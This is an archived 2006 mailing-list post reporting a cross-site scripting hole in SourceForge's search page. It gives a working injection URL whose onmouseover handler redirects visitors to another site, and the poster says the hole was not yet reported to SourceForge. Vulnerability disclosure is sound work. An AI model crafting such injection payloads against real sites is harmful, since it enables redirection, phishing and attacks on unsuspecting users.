Vulnerability Development: Sourceforge.net XSS

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

Sourceforge.net XSS

From: the.spikey () gmail com
Date: 9 Apr 2006 18:13:31 -0000

Hey guys,
I found this kind of 'hole' in sf.net, you can exucute some code, not all.(i.e. you cannot use a / )
I have not reported this yet, i'm sorry :+


Try it out:

http://sourceforge.net/search/?type_of_search=soft&forum_id=0&group_id=0&atid=0&words=<span style="position: fixed; 
top: 0px; left: 0px; color: red; width: 1000px; height: 1000px" 
onmouseOver="javascript:window.location='http://www.google.nl'">&Search=Search

Spiked
www.geekshangout.org

By Date By Thread

Current thread:

Sourceforge.net XSS the . spikey (Apr 09)
- <Possible follow-ups>
- Re: Sourceforge.net XSS v9 (Apr 12)
  - Re: Sourceforge.net XSS Daniel (Apr 12)
- Re: Re: Sourceforge.net XSS v9 (Apr 13)
  - Re: Sourceforge.net XSS ascii (Apr 13)
- Re: Sourceforge.net XSS Juan C Calderon (Apr 17)